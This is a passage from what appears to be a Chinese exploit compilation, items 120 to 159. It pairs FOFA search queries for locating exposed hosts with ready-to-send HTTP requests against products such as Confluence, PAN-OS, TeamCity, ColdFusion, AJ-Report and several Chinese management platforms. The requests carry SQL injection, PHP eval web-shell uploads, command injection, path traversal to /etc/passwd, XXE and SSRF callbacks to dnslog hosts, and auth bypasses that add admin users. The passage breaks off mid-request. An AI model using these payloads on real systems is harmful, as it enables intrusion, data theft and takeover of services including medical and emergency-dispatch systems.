Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The parameter sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123

After the user is created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the returned file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
